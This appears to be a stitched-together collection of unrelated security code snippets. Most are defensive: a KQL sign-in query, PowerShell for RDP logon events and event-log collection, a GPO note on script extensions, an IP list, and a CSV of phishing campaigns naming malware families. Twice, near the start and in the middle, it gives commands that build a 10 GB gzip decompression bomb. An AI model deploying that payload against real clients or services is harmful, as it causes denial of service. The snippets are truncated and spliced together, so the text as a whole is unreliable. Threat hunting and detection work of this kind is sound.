- Generate the file:
$ awk 'BEGIN { for(c=0;c<10000000;c++) printf "<p>LOL</p>" }' > 100M.html
$ (for I in `seq 1 100`; do cat 100M.html; done) | pv | gzip -9 > 10G.boomgz
- Check it is indeed good:
union SigninLogs, AADNonInteractiveUserSignInLogs | |
| where AutonomousSystemNumber in (33438, 25369, 62240, 9009, 60068, 40676, 8100) | |
| summarize | |
min(TimeGenerated), | |
max(TimeGenerated), | |
ResultTypes = make_set(ResultType), | |
IPAddresses = make_set(IPAddress), | |
ASNs = make_set(AutonomousSystemNumber), | |
AppDisplayNames = make_set(AppDisplayName), | |
ClientAppUsed = make_set_if(ClientAppUsed, isnotempty(ClientAppUsed)), |
function Get-RdpLogonEvent | |
{ | |
[CmdletBinding()] | |
param( | |
[Int32] $Last = 10 | |
) | |
$RdpInteractiveLogons = Get-WinEvent -FilterHashtable @{ | |
LogName='Security' | |
ProviderName='Microsoft-Windows-Security-Auditing' |
#Ensure errors don't ruin anything for us | |
$ErrorActionPreference = "SilentlyContinue" | |
# Set variables | |
$DesktopPath = [Environment]::GetFolderPath("Desktop") | |
$basic = "C:\windows\System32\winevt\Logs\Application.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx", "C:\windows\System32\winevt\Logs\System.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx", "C:\windows\System32\winevt\Logs\Security.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx" | |
$remote_logs = "C:\windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx" |
$ awk 'BEGIN { for(c=0;c<10000000;c++) printf "<p>LOL</p>" }' > 100M.html
$ (for I in `seq 1 100`; do cat 100M.html; done) | pv | gzip -9 > 10G.boomgz
You can create a GPO to test changing the default behavior of the following extensions to not behave as a script | |
but rather as a benign text file opened in notepad. | |
js | |
wsh | |
vbs | |
wsc | |
sct | |
jse | |
wsf |
# Log the time prior to executing the action. | |
# This will be used as parth of an event log XPath filter. | |
$DateTimeBefore = [Xml.XmlConvert]::ToString((Get-Date).ToUniversalTime(), [System.Xml.XmlDateTimeSerializationMode]::Utc) | |
# Do the thing now that you want to see potential relevant events surface... | |
$null = Mount-DiskImage -ImagePath "$PWD\FeelTheBurn.iso" -StorageType ISO -Access ReadOnly | |
# Allow a moment to allow events to populate | |
Start-Sleep -Seconds 5 |
[ | |
[ | |
"NtLockProductActivationKeys", | |
[ | |
"UInt32 *", | |
"UInt32 *" | |
] | |
], | |
[ | |
"NtLockProductActivationKeys", |
178.62.115.135 | |
167.99.197.196 | |
138.68.131.250 | |
195.206.181.141 | |
193.29.13.201 | |
5.61.61.49 | |
139.59.172.170 | |
46.101.63.124 | |
206.189.121.65 | |
46.101.47.102 |
Date,Details,Email Payload Type,Users Targeted | |
12/1/2020,Balance Payment; pdf -> agenttesla,Attachment,2 | |
12/1/2020,All subjects contain DocuSign floydnicholsonsc.com sender; link -> hancitor -> ficker,Link,8257 | |
12/2/2020,All subjects contain DocuSign frankstaropoli.com sender; link -> hancitor -> ficker,Link,4810 | |
12/2/2020,Subjects Invoice <digits>; xlsm|xls -> dridex,Attachment,117 | |
12/2/2020,Re:Re: New Purchase Order-030220- SMART SOURCING INC; link -> agenttesla,Link,5 | |
12/2/2020,Re: Re: Proforma PI-08598; gz -> remcos,Attachment,3 | |
12/3/2020,All subjects contain DocuSign freitasforcongress.com sender; link -> hancitor -> ficker,Link,6047 | |
12/3/2020,BALANCE PAYMENT; z -> agenttesla,Attachment,4 | |
12/3/2020,RE: Payment Advice; z -> agenttesla,Attachment,4 |